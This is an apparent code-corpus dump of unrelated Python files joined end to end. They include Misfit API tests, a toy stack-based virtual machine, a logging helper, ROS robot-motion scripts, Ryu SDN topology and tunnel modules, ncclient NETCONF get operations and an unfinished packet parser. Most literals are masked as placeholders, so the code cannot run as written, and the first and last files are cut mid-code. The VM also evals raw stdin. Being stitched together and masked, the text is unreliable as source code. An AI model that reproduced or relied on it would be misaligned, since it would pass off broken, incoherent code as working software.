percent_complete ( ) is None <EOL> def test_goal_single ( self ) : <EOL> """<STR_LIT>""" <EOL> goal_dict = { <EOL> "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT:date>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:1000> , <EOL> "<STR_LIT>" : - <NUM_LIT:8> <EOL> } <EOL> with HTTMock ( MisfitHttMock ( '<STR_LIT>' ) . json_http ) : <EOL> goal = self . misfit . goal ( object_id = goal_dict [ '<STR_LIT:id>' ] ) <EOL> eq_ ( type ( goal ) , MisfitGoal ) <EOL> self . assert_misfit_string ( goal , goal_dict ) <EOL> eq_ ( goal . id , goal_dict [ '<STR_LIT:id>' ] ) <EOL> eq_ ( goal . date , arrow . get ( goal_dict [ '<STR_LIT:date>' ] ) ) <EOL> eq_ ( goal . points , goal_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( goal . targetPoints , goal_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( goal . timeZoneOffset , goal_dict [ '<STR_LIT>' ] ) <EOL> self . assertAlmostEqual ( goal . percent_complete ( ) , <NUM_LIT:50> ) <EOL> goal . targetPoints = <NUM_LIT:0> <EOL> assert goal . percent_complete ( ) is None <EOL> def test_goal_object_date_exception ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( MisfitException , self . misfit . goal ) <EOL> def test_summary ( self ) : <EOL> """<STR_LIT>""" <EOL> date_range = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> with HTTMock ( MisfitHttMock ( '<STR_LIT>' ) . json_http ) : <EOL> summary = self . misfit . summary ( start_date = '<STR_LIT>' , <EOL> end_date = '<STR_LIT>' ) <EOL> summ_dict = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> <EOL> } <EOL> eq_ ( type ( summary ) , MisfitSummary ) <EOL> self . assert_misfit_string ( summary , summ_dict ) <EOL> eq_ ( summary . data , summ_dict ) <EOL> eq_ ( summary . activityCalories , summ_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( summary . calories , summ_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( summary . 
distance , summ_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( summary . points , summ_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( summary . steps , summ_dict [ '<STR_LIT>' ] ) <EOL> def test_summary_detail ( self ) : <EOL> summ_dict = { <EOL> "<STR_LIT:date>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> <EOL> } <EOL> end_date = "<STR_LIT>" <EOL> with HTTMock ( MisfitHttMock ( '<STR_LIT>' ) . json_http ) : <EOL> summary_list = self . misfit . summary ( <EOL> start_date = summ_dict [ '<STR_LIT:date>' ] , end_date = end_date , detail = True ) <EOL> eq_ ( len ( summary_list ) , <NUM_LIT:3> ) <EOL> summary = summary_list [ <NUM_LIT:0> ] <EOL> eq_ ( type ( summary ) , MisfitSummary ) <EOL> self . assert_misfit_string ( summary , summ_dict ) <EOL> eq_ ( summary_list [ <NUM_LIT:2> ] . date , arrow . get ( end_date ) ) <EOL> eq_ ( summary . data , summ_dict ) <EOL> eq_ ( summary . date , arrow . get ( summ_dict [ '<STR_LIT:date>' ] ) ) <EOL> eq_ ( summary . points , summ_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( summary . steps , summ_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( summary . calories , summ_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( summary . activityCalories , summ_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( summary . distance , summ_dict [ '<STR_LIT>' ] ) <EOL> def assert_misfit_string ( self , obj , data ) : <EOL> """<STR_LIT>""" <EOL> parts = ( '<STR_LIT:%s>' % obj ) . split ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> eq_ ( parts [ <NUM_LIT:0> ] , '<STR_LIT:%s>' % type ( obj ) ) <EOL> eq_ ( json . loads ( parts [ <NUM_LIT:1> ] ) , data ) </s>
import sys

# Symbolic opcode name -> numeric opcode value for the bytecode interpreted by
# Machine below.  Each name is also exported as a module-level constant (see
# the setattr loop further down) so programs can be written symbolically.
OPCODES = {
    '<STR_LIT>': <NUM_LIT:0>,
    '<STR_LIT>': <NUM_LIT:1>,
    '<STR_LIT>': <NUM_LIT:6>,
    '<STR_LIT>': <NUM_LIT:7>,
    '<STR_LIT>': <NUM_LIT:10>,
    '<STR_LIT>': <NUM_LIT:11>,
    '<STR_LIT>': <NUM_LIT:12>,
    '<STR_LIT>': <NUM_LIT:16>,
    '<STR_LIT>': <NUM_LIT>,
    '<STR_LIT>': <NUM_LIT>,
    '<STR_LIT>': <NUM_LIT:20>,
    '<STR_LIT>': <NUM_LIT>,
    '<STR_LIT>': <NUM_LIT>,
    '<STR_LIT>': <NUM_LIT>,
    '<STR_LIT>': <NUM_LIT>,
    '<STR_LIT>': <NUM_LIT>,
    '<STR_LIT>': <NUM_LIT:30>,
    '<STR_LIT>': <NUM_LIT>,
    '<STR_LIT>': <NUM_LIT:32>,
    '<STR_LIT>': <NUM_LIT>,
    '<STR_LIT>': <NUM_LIT>,
    '<STR_LIT>': <NUM_LIT>,
    '<STR_LIT>': <NUM_LIT>,
    '<STR_LIT>': <NUM_LIT>,
    '<STR_LIT>': <NUM_LIT>,
    '<STR_LIT>': <NUM_LIT>,
    '<STR_LIT>': <NUM_LIT:50>,
    '<STR_LIT>': <NUM_LIT>
}

# Reverse mapping: numeric opcode -> symbolic name, used by Machine.step for
# dispatch.  NOTE: .iteritems(), print statements and backtick-repr below make
# this module Python 2 only.
NAMES = dict((v, k) for k, v in OPCODES.iteritems())

# Export every opcode name as a module-level constant.
module = sys.modules[__name__]
for name, value in OPCODES.iteritems():
    setattr(module, name, value)


class Machine:
    """A small stack-based virtual machine.

    `sequence` is both the program and its data memory: LOAD/SAVE index into
    the very list the instructions are fetched from, so programs may
    self-modify.  `offset` is the instruction pointer; `stack` the operand
    stack.
    """

    def __init__(self, sequence):
        self.offset = <NUM_LIT:0>          # instruction pointer into `sequence`
        self.sequence = sequence
        self.stack = []

    def step(self):
        """Execute one instruction; return True while the IP stays in range."""
        instruction = NAMES[self.sequence[self.offset]]
        # Dispatch to the matching instruction_<name> method.
        method = getattr(self, "<STR_LIT>" % instruction.lower())
        method()
        # HALT sets offset to -1, which also terminates this test.
        return self.offset >= <NUM_LIT:0> and self.offset < len(self.sequence)

    def run(self):
        """Step until the instruction pointer leaves the sequence."""
        result = True
        while result:
            result = self.step()

    def instruction_nop(self):
        # Do nothing; advance past the opcode.
        self.offset += <NUM_LIT:1>

    def instruction_halt(self):
        # Force the IP out of range so step() reports termination.
        self.offset = -<NUM_LIT:1>

    def instruction_load(self):
        # Push sequence[address]; the address is the inline operand.
        self.offset += <NUM_LIT:1>
        address = self.sequence[self.offset]
        self.stack.append(self.sequence[address])
        self.offset += <NUM_LIT:1>

    def instruction_save(self):
        # Pop the top of stack into sequence[address] (self-modifying store).
        self.offset += <NUM_LIT:1>
        address = self.sequence[self.offset]
        self.sequence[address] = self.stack.pop()
        self.offset += <NUM_LIT:1>

    def instruction_push(self):
        # Push the inline immediate operand.
        self.offset += <NUM_LIT:1>
        self.stack.append(self.sequence[self.offset])
        self.offset += <NUM_LIT:1>

    def instruction_pop(self):
        # Discard the top of stack.
        self.offset += <NUM_LIT:1>
        self.stack.pop()

    def instruction_dup(self):
        # Duplicate the top of stack.
        self.offset += <NUM_LIT:1>
        self.stack.append(self.stack[-<NUM_LIT:1>])

    def instruction_jmp(self):
        # Unconditional jump to the inline address operand.
        self.offset += <NUM_LIT:1>
        address = self.sequence[self.offset]
        self.offset = address

    def instruction_call(self):
        # Push the return address (the slot just past the address operand),
        # then jump to the operand address.
        self.offset += <NUM_LIT:1>
        self.stack.append(self.offset + <NUM_LIT:1>)
        address = self.sequence[self.offset]
        self.offset = address

    def instruction_ret(self):
        # Return: pop the address pushed by CALL and jump to it.
        address = self.stack.pop()
        self.offset = address

    # Conditional jumps below pop one value and test its sign.  NOTE(review):
    # the tests look inverted relative to the mnemonic (jlt jumps on > 0) --
    # this is consistent with instruction_sub pushing (top - second), i.e.
    # b - a when a was pushed first, so jlt fires exactly when a < b.  Confirm
    # against the intended ISA before "fixing" either side.
    def instruction_jlt(self):
        self.offset += <NUM_LIT:1>
        address = self.sequence[self.offset]
        value = self.stack.pop()
        self.offset += <NUM_LIT:1>
        if value > <NUM_LIT:0>:
            self.offset = address

    def instruction_jlte(self):
        self.offset += <NUM_LIT:1>
        address = self.sequence[self.offset]
        value = self.stack.pop()
        self.offset += <NUM_LIT:1>
        if value >= <NUM_LIT:0>:
            self.offset = address

    def instruction_je(self):
        self.offset += <NUM_LIT:1>
        address = self.sequence[self.offset]
        value = self.stack.pop()
        self.offset += <NUM_LIT:1>
        if value == <NUM_LIT:0>:
            self.offset = address

    def instruction_jne(self):
        self.offset += <NUM_LIT:1>
        address = self.sequence[self.offset]
        value = self.stack.pop()
        self.offset += <NUM_LIT:1>
        if value != <NUM_LIT:0>:
            self.offset = address

    def instruction_jgte(self):
        self.offset += <NUM_LIT:1>
        address = self.sequence[self.offset]
        value = self.stack.pop()
        self.offset += <NUM_LIT:1>
        if value <= <NUM_LIT:0>:
            self.offset = address

    def instruction_jgt(self):
        self.offset += <NUM_LIT:1>
        address = self.sequence[self.offset]
        value = self.stack.pop()
        self.offset += <NUM_LIT:1>
        if value < <NUM_LIT:0>:
            self.offset = address

    # Comparison instructions pop b (top) then a, and push int(a OP b) (0/1).
    def instruction_cmplt(self):
        self.offset += <NUM_LIT:1>
        b = self.stack.pop()
        a = self.stack.pop()
        self.stack.append(int(a < b))

    def instruction_cmplte(self):
        self.offset += <NUM_LIT:1>
        b = self.stack.pop()
        a = self.stack.pop()
        self.stack.append(int(a <= b))

    def instruction_cmpe(self):
        self.offset += <NUM_LIT:1>
        b = self.stack.pop()
        a = self.stack.pop()
        self.stack.append(int(a == b))

    def instruction_cmpne(self):
        self.offset += <NUM_LIT:1>
        b = self.stack.pop()
        a = self.stack.pop()
        self.stack.append(int(a != b))

    def instruction_cmpgt(self):
        self.offset += <NUM_LIT:1>
        b = self.stack.pop()
        a = self.stack.pop()
        self.stack.append(int(a > b))

    def instruction_cmpgte(self):
        self.offset += <NUM_LIT:1>
        b = self.stack.pop()
        a = self.stack.pop()
        self.stack.append(int(a >= b))

    def instruction_mul(self):
        self.offset += <NUM_LIT:1>
        self.stack.append(self.stack.pop() * self.stack.pop())

    def instruction_div(self):
        self.offset += <NUM_LIT:1>
        # NOTE(review): pop order means this computes top / second (b / a when
        # a was pushed first); most stack ISAs compute a / b.  Also Python 2
        # integer division truncates.  Confirm intent.
        self.stack.append(self.stack.pop() / self.stack.pop())

    def instruction_add(self):
        self.offset += <NUM_LIT:1>
        self.stack.append(self.stack.pop() + self.stack.pop())

    def instruction_sub(self):
        self.offset += <NUM_LIT:1>
        # NOTE(review): computes top - second (b - a when a was pushed first);
        # the inverted-looking conditional jumps above rely on this order.
        self.stack.append(self.stack.pop() - self.stack.pop())

    def instruction_print(self):
        # Print the top of stack without consuming it.
        self.offset += <NUM_LIT:1>
        print self.stack[-<NUM_LIT:1>]

    def instruction_debug(self):
        self.offset += <NUM_LIT:1>
        self.debug()

    def debug(self):
        """Dump the full machine state (memory, stack, IP) to stdout."""
        print "<STR_LIT>"
        print "<STR_LIT>" + `self.sequence`
        print "<STR_LIT>" + `self.stack`
        print "<STR_LIT>" + `self.offset`


if __name__ == '<STR_LIT:__main__>':
    # Read a Python literal (e.g. a list of ints) from stdin and run it.
    # HACK: eval() of raw stdin -- only safe for trusted input.
    buffer = sys.stdin.read()
    code = eval(buffer)
    machine = Machine(code)
    machine.run()
    machine.debug()
import logging

import settings

# (handler, level) pairs to attach to the root logger.  Instantiated once at
# import time; init_logger() configures and registers them.
handlers = [
    (logging.StreamHandler(), logging.DEBUG),
]


def init_logger():
    """Configure the root logger.

    Sets the root level to DEBUG and attaches every handler from the
    module-level ``handlers`` list with a shared formatter and its own level.

    Idempotent: the previous version re-added the same handler objects on
    every call, so calling it twice duplicated each emitted log record; the
    membership guard below fixes that while keeping the first call's
    behavior unchanged.
    """
    log_formatter = logging.Formatter("<STR_LIT>")
    main_logger = logging.getLogger()
    main_logger.setLevel(logging.DEBUG)
    for handler, level in handlers:
        handler.setFormatter(log_formatter)
        handler.setLevel(level)
        # Only attach a handler that is not already registered -- repeated
        # init_logger() calls must not duplicate output.
        if handler not in main_logger.handlers:
            main_logger.addHandler(handler)
<s> import rospy <EOL> import actionlib <EOL> from move_base_msgs . msg import MoveBaseAction , MoveBaseGoal <EOL> waypoints = [ <EOL> [ ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.0> ) , ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) ] , <EOL> [ ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.0> ) , ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , - <NUM_LIT> , <NUM_LIT> ) ] <EOL> ] <EOL> def goal_pose ( pose ) : <EOL> goal_pose = MoveBaseGoal ( ) <EOL> goal_pose . target_pose . header . frame_id = '<STR_LIT>' <EOL> goal_pose . target_pose . pose . position . x = pose [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> goal_pose . target_pose . pose . position . y = pose [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> goal_pose . target_pose . pose . position . z = pose [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] <EOL> goal_pose . target_pose . pose . orientation . x = pose [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> goal_pose . target_pose . pose . orientation . y = pose [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> goal_pose . target_pose . pose . orientation . z = pose [ <NUM_LIT:1> ] [ <NUM_LIT:2> ] <EOL> goal_pose . target_pose . pose . orientation . w = pose [ <NUM_LIT:1> ] [ <NUM_LIT:3> ] <EOL> return goal_pose <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> rospy . init_node ( '<STR_LIT>' ) <EOL> client = actionlib . SimpleActionClient ( '<STR_LIT>' , MoveBaseAction ) <EOL> client . wait_for_server ( ) <EOL> while True : <EOL> for pose in waypoints : <EOL> goal = goal_pose ( pose ) <EOL> client . send_goal ( goal ) <EOL> client . wait_for_result ( ) </s>
<s> import rospy , actionlib <EOL> from control_msgs . msg import ( FollowJointTrajectoryAction , <EOL> FollowJointTrajectoryGoal ) <EOL> from trajectory_msgs . msg import JointTrajectory , JointTrajectoryPoint <EOL> arm_joint_names = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> arm_intermediate_positions = [ <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT:0.0> ] <EOL> arm_joint_positions = [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT:0.0> ] <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> rospy . init_node ( "<STR_LIT>" ) <EOL> arm_client = actionlib . SimpleActionClient ( "<STR_LIT>" , FollowJointTrajectoryAction ) <EOL> arm_client . wait_for_server ( ) <EOL> trajectory = JointTrajectory ( ) <EOL> trajectory . joint_names = arm_joint_names <EOL> trajectory . points . append ( JointTrajectoryPoint ( ) ) <EOL> trajectory . points [ <NUM_LIT:0> ] . positions = [ <NUM_LIT:0.0> ] * len ( arm_joint_positions ) <EOL> trajectory . points [ <NUM_LIT:0> ] . velocities = [ <NUM_LIT:0.0> ] * len ( arm_joint_positions ) <EOL> trajectory . points [ <NUM_LIT:0> ] . accelerations = [ <NUM_LIT:0.0> ] * len ( arm_joint_positions ) <EOL> trajectory . points [ <NUM_LIT:0> ] . time_from_start = rospy . Duration ( <NUM_LIT:1.0> ) <EOL> trajectory . points . append ( JointTrajectoryPoint ( ) ) <EOL> trajectory . points [ <NUM_LIT:1> ] . positions = arm_intermediate_positions <EOL> trajectory . points [ <NUM_LIT:1> ] . velocities = [ <NUM_LIT:0.0> ] * len ( arm_joint_positions ) <EOL> trajectory . points [ <NUM_LIT:1> ] . accelerations = [ <NUM_LIT:0.0> ] * len ( arm_joint_positions ) <EOL> trajectory . points [ <NUM_LIT:1> ] . time_from_start = rospy . Duration ( <NUM_LIT> ) <EOL> trajectory . points . append ( JointTrajectoryPoint ( ) ) <EOL> trajectory . points [ <NUM_LIT:2> ] . 
positions = arm_joint_positions <EOL> trajectory . points [ <NUM_LIT:2> ] . velocities = [ <NUM_LIT:0.0> ] * len ( arm_joint_positions ) <EOL> trajectory . points [ <NUM_LIT:2> ] . accelerations = [ <NUM_LIT:0.0> ] * len ( arm_joint_positions ) <EOL> trajectory . points [ <NUM_LIT:2> ] . time_from_start = rospy . Duration ( <NUM_LIT> ) <EOL> arm_goal = FollowJointTrajectoryGoal ( ) <EOL> arm_goal . trajectory = trajectory <EOL> arm_goal . goal_time_tolerance = rospy . Duration ( <NUM_LIT:0.0> ) <EOL> arm_client . send_goal ( arm_goal ) <EOL> arm_client . wait_for_result ( rospy . Duration ( <NUM_LIT> ) ) </s>
import json

from webob import Response

from ryu.app.wsgi import ControllerBase, WSGIApplication, route
from ryu.base import app_manager
from ryu.lib import dpid as dpid_lib
from ryu.topology.api import get_switch, get_link, get_host


class TopologyAPI(app_manager.RyuApp):
    """Ryu application that publishes the discovered topology over REST."""

    _CONTEXTS = {
        '<STR_LIT>': WSGIApplication
    }

    def __init__(self, *args, **kwargs):
        super(TopologyAPI, self).__init__(*args, **kwargs)
        wsgi = kwargs['<STR_LIT>']
        wsgi.register(TopologyController, {'<STR_LIT>': self})


class TopologyController(ControllerBase):
    """REST controller serving switch/link/host queries as JSON."""

    def __init__(self, req, link, data, **config):
        super(TopologyController, self).__init__(req, link, data, **config)
        self.topology_api_app = data['<STR_LIT>']

    @route('<STR_LIT>', '<STR_LIT>',
           methods=['<STR_LIT:GET>'])
    def list_switches(self, req, **kwargs):
        return self._switches(req, **kwargs)

    @route('<STR_LIT>', '<STR_LIT>',
           methods=['<STR_LIT:GET>'], requirements={'<STR_LIT>': dpid_lib.DPID_PATTERN})
    def get_switch(self, req, **kwargs):
        return self._switches(req, **kwargs)

    @route('<STR_LIT>', '<STR_LIT>',
           methods=['<STR_LIT:GET>'])
    def list_links(self, req, **kwargs):
        return self._links(req, **kwargs)

    @route('<STR_LIT>', '<STR_LIT>',
           methods=['<STR_LIT:GET>'], requirements={'<STR_LIT>': dpid_lib.DPID_PATTERN})
    def get_links(self, req, **kwargs):
        return self._links(req, **kwargs)

    @route('<STR_LIT>', '<STR_LIT>',
           methods=['<STR_LIT:GET>'])
    def list_hosts(self, req, **kwargs):
        return self._hosts(req, **kwargs)

    @route('<STR_LIT>', '<STR_LIT>',
           methods=['<STR_LIT:GET>'], requirements={'<STR_LIT>': dpid_lib.DPID_PATTERN})
    def get_hosts(self, req, **kwargs):
        return self._hosts(req, **kwargs)

    @staticmethod
    def _extract_dpid(kwargs):
        # The dpid URL parameter is only present on the single-item routes;
        # None means "all datapaths".
        raw = kwargs.get('<STR_LIT>')
        return None if raw is None else dpid_lib.str_to_dpid(raw)

    @staticmethod
    def _json_response(items):
        # Serialize a list of topology objects via their to_dict() form.
        body = json.dumps([item.to_dict() for item in items])
        return Response(content_type='<STR_LIT:application/json>', body=body)

    def _switches(self, req, **kwargs):
        dpid = self._extract_dpid(kwargs)
        return self._json_response(get_switch(self.topology_api_app, dpid))

    def _links(self, req, **kwargs):
        dpid = self._extract_dpid(kwargs)
        return self._json_response(get_link(self.topology_api_app, dpid))

    def _hosts(self, req, **kwargs):
        dpid = self._extract_dpid(kwargs)
        return self._json_response(get_host(self.topology_api_app, dpid))
from rpc import RPC, RPCReply

from ncclient.xml_ import *
import util


class GetReply(RPCReply):
    """Reply to a <get>-style operation; exposes the retrieved *data* element."""

    def _parsing_hook(self, root):
        # Only locate the data element when the reply carried no RPC errors.
        self._data = root.find(qualify("<STR_LIT:data>")) if not self._errors else None

    def _parsed_data(self):
        # Lazily parse the reply before handing out the data element.
        if not self._parsed:
            self.parse()
        return self._data

    @property
    def data_ele(self):
        "<STR_LIT>"
        return self._parsed_data()

    @property
    def data_xml(self):
        "<STR_LIT>"
        return to_xml(self._parsed_data())

    data = data_ele
    "<STR_LIT>"


class Get(RPC):
    "<STR_LIT>"

    REPLY_CLS = GetReply
    "<STR_LIT>"

    def request(self, filter=None):
        """Build and send a <get> request, optionally narrowed by *filter*."""
        rpc_node = new_ele("<STR_LIT>")
        if filter is not None:
            rpc_node.append(util.build_filter(filter))
        return self._request(rpc_node)


class GetConfig(RPC):
    "<STR_LIT>"

    REPLY_CLS = GetReply
    "<STR_LIT>"

    def request(self, source, filter=None):
        """Build and send a <get-config> request against datastore *source*,
        optionally narrowed by *filter*."""
        rpc_node = new_ele("<STR_LIT>")
        rpc_node.append(util.datastore_or_url("<STR_LIT:source>", source, self._assert))
        if filter is not None:
            rpc_node.append(util.build_filter(filter))
        return self._request(rpc_node)


class Dispatch(RPC):
    "<STR_LIT>"

    REPLY_CLS = GetReply
    "<STR_LIT>"

    def request(self, rpc_command, source=None, filter=None):
        """Send an arbitrary RPC: *rpc_command* may be a ready-made element
        or a tag name to wrap; *source* and *filter* are appended if given."""
        node = rpc_command if ET.iselement(rpc_command) else new_ele(rpc_command)
        if source is not None:
            node.append(util.datastore_or_url("<STR_LIT:source>", source, self._assert))
        if filter is not None:
            node.append(util.build_filter(filter))
        return self._request(node)
<s> import collections <EOL> import logging <EOL> import ryu . exception as ryu_exc <EOL> from ryu . base import app_manager <EOL> from ryu . controller import event <EOL> class RemoteDPIDAlreadyExist ( ryu_exc . RyuException ) : <EOL> message = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class TunnelKeyAlreadyExist ( ryu_exc . RyuException ) : <EOL> message = '<STR_LIT>' <EOL> class TunnelKeyNotFound ( ryu_exc . RyuException ) : <EOL> message = '<STR_LIT>' <EOL> class EventTunnelKeyBase ( event . EventBase ) : <EOL> def __init__ ( self , network_id , tunnel_key ) : <EOL> super ( EventTunnelKeyBase , self ) . __init__ ( ) <EOL> self . network_id = network_id <EOL> self . tunnel_key = tunnel_key <EOL> class EventTunnelKeyAdd ( EventTunnelKeyBase ) : <EOL> def __init__ ( self , network_id , tunnel_key ) : <EOL> super ( EventTunnelKeyAdd , self ) . __init__ ( network_id , tunnel_key ) <EOL> class EventTunnelKeyDel ( EventTunnelKeyBase ) : <EOL> def __init__ ( self , network_id , tunnel_key ) : <EOL> super ( EventTunnelKeyDel , self ) . __init__ ( network_id , tunnel_key ) <EOL> class EventTunnelPort ( event . EventBase ) : <EOL> def __init__ ( self , dpid , port_no , remote_dpid , add_del ) : <EOL> super ( EventTunnelPort , self ) . __init__ ( ) <EOL> self . dpid = dpid <EOL> self . port_no = port_no <EOL> self . remote_dpid = remote_dpid <EOL> self . add_del = add_del <EOL> class TunnelKeys ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , f ) : <EOL> super ( TunnelKeys , self ) . __init__ ( ) <EOL> self . send_event = f <EOL> def get_key ( self , network_id ) : <EOL> try : <EOL> return self [ network_id ] <EOL> except KeyError : <EOL> raise TunnelKeyNotFound ( network_id = network_id ) <EOL> def _set_key ( self , network_id , tunnel_key ) : <EOL> self [ network_id ] = tunnel_key <EOL> self . 
send_event ( EventTunnelKeyAdd ( network_id , tunnel_key ) ) <EOL> def register_key ( self , network_id , tunnel_key ) : <EOL> if network_id in self : <EOL> raise ryu_exc . NetworkAlreadyExist ( network_id = network_id ) <EOL> if tunnel_key in self . values ( ) : <EOL> raise TunnelKeyAlreadyExist ( tunnel_key = tunnel_key ) <EOL> self . _set_key ( network_id , tunnel_key ) <EOL> def update_key ( self , network_id , tunnel_key ) : <EOL> if network_id not in self and tunnel_key in self . values ( ) : <EOL> raise TunnelKeyAlreadyExist ( key = tunnel_key ) <EOL> key = self . get ( network_id ) <EOL> if key is None : <EOL> self . _set_key ( network_id , tunnel_key ) <EOL> return <EOL> if key != tunnel_key : <EOL> raise ryu_exc . NetworkAlreadyExist ( network_id = network_id ) <EOL> def delete_key ( self , network_id ) : <EOL> try : <EOL> tunnel_key = self [ network_id ] <EOL> self . send_event ( EventTunnelKeyDel ( network_id , tunnel_key ) ) <EOL> del self [ network_id ] <EOL> except KeyError : <EOL> raise ryu_exc . NetworkNotFound ( network_id = network_id ) <EOL> class DPIDs ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , f ) : <EOL> super ( DPIDs , self ) . __init__ ( ) <EOL> self . dpids = collections . defaultdict ( dict ) <EOL> self . send_event = f <EOL> def list_ports ( self , dpid ) : <EOL> return self . dpids [ dpid ] <EOL> def _add_remote_dpid ( self , dpid , port_no , remote_dpid ) : <EOL> self . dpids [ dpid ] [ port_no ] = remote_dpid <EOL> self . send_event ( EventTunnelPort ( dpid , port_no , remote_dpid , True ) ) <EOL> def add_remote_dpid ( self , dpid , port_no , remote_dpid ) : <EOL> if port_no in self . dpids [ dpid ] : <EOL> raise ryu_exc . PortAlreadyExist ( dpid = dpid , port = port_no , <EOL> network_id = None ) <EOL> self . _add_remote_dpid ( dpid , port_no , remote_dpid ) <EOL> def update_remote_dpid ( self , dpid , port_no , remote_dpid ) : <EOL> remote_dpid_ = self . dpids [ dpid ] . 
get ( port_no ) <EOL> if remote_dpid_ is None : <EOL> self . _add_remote_dpid ( dpid , port_no , remote_dpid ) <EOL> elif remote_dpid_ != remote_dpid : <EOL> raise ryu_exc . RemoteDPIDAlreadyExist ( dpid = dpid , port = port_no , <EOL> remote_dpid = remote_dpid ) <EOL> def get_remote_dpid ( self , dpid , port_no ) : <EOL> try : <EOL> return self . dpids [ dpid ] [ port_no ] <EOL> except KeyError : <EOL> raise ryu_exc . PortNotFound ( dpid = dpid , port = port_no ) <EOL> def delete_port ( self , dpid , port_no ) : <EOL> try : <EOL> remote_dpid = self . dpids [ dpid ] [ port_no ] <EOL> self . send_event ( EventTunnelPort ( dpid , port_no , remote_dpid , False ) ) <EOL> del self . dpids [ dpid ] [ port_no ] <EOL> except KeyError : <EOL> raise ryu_exc . PortNotFound ( dpid = dpid , port = port_no ) <EOL> def get_port ( self , dpid , remote_dpid ) : <EOL> try : <EOL> dp = self . dpids [ dpid ] <EOL> except KeyError : <EOL> raise ryu_exc . PortNotFound ( dpid = dpid , port = None , network_id = None ) <EOL> res = [ port_no for ( port_no , remote_dpid_ ) in dp . items ( ) <EOL> if remote_dpid_ == remote_dpid ] <EOL> assert len ( res ) <= <NUM_LIT:1> <EOL> if len ( res ) == <NUM_LIT:0> : <EOL> raise ryu_exc . PortNotFound ( dpid = dpid , port = None , network_id = None ) <EOL> return res [ <NUM_LIT:0> ] <EOL> class Tunnels ( app_manager . RyuApp ) : <EOL> def __init__ ( self ) : <EOL> super ( Tunnels , self ) . __init__ ( ) <EOL> self . name = '<STR_LIT>' <EOL> self . tunnel_keys = TunnelKeys ( self . send_event_to_observers ) <EOL> self . dpids = DPIDs ( self . send_event_to_observers ) <EOL> def get_key ( self , network_id ) : <EOL> return self . tunnel_keys . get_key ( network_id ) <EOL> def register_key ( self , network_id , tunnel_key ) : <EOL> self . tunnel_keys . register_key ( network_id , tunnel_key ) <EOL> def update_key ( self , network_id , tunnel_key ) : <EOL> self . tunnel_keys . 
update_key ( network_id , tunnel_key ) <EOL> def delete_key ( self , network_id ) : <EOL> self . tunnel_keys . delete_key ( network_id ) <EOL> def list_ports ( self , dpid ) : <EOL> return self . dpids . list_ports ( dpid ) . keys ( ) <EOL> def register_port ( self , dpid , port_no , remote_dpid ) : <EOL> self . dpids . add_remote_dpid ( dpid , port_no , remote_dpid ) <EOL> def update_port ( self , dpid , port_no , remote_dpid ) : <EOL> self . dpids . update_remote_dpid ( dpid , port_no , remote_dpid ) <EOL> def get_remote_dpid ( self , dpid , port_no ) : <EOL> return self . dpids . get_remote_dpid ( dpid , port_no ) <EOL> def delete_port ( self , dpid , port_no ) : <EOL> self . dpids . delete_port ( dpid , port_no ) <EOL> def get_port ( self , dpid , remote_dpid ) : <EOL> return self . dpids . get_port ( dpid , remote_dpid ) </s>
<s> """<STR_LIT>""" </s>
import inspect
import six
import struct

from . import packet_base
from . import ethernet


class Packet(object):
    """An ordered stack of protocol headers plus an optional raw payload.

    `protocols` holds parsed protocol instances (outermost first) and, as its
    last element, any unparsed leftover bytes.  `data` is the raw wire form.
    When constructed with `data`, it is parsed immediately starting from
    `parse_cls` (Ethernet by default).
    """

    def __init__(self, data=None, protocols=None, parse_cls=ethernet.ethernet):
        super(Packet, self).__init__()
        self.data = data
        if protocols is None:
            self.protocols = []
        else:
            self.protocols = protocols
        if self.data:
            self._parser(parse_cls)

    def _parser(self, cls):
        """Parse self.data by chaining parser classes.

        Each cls.parser(bytes) is expected to return (instance, next_cls,
        remaining_bytes); the chain stops when next_cls is falsy or a
        struct.error signals truncated input.  Leftover bytes are appended
        to protocols as-is.
        """
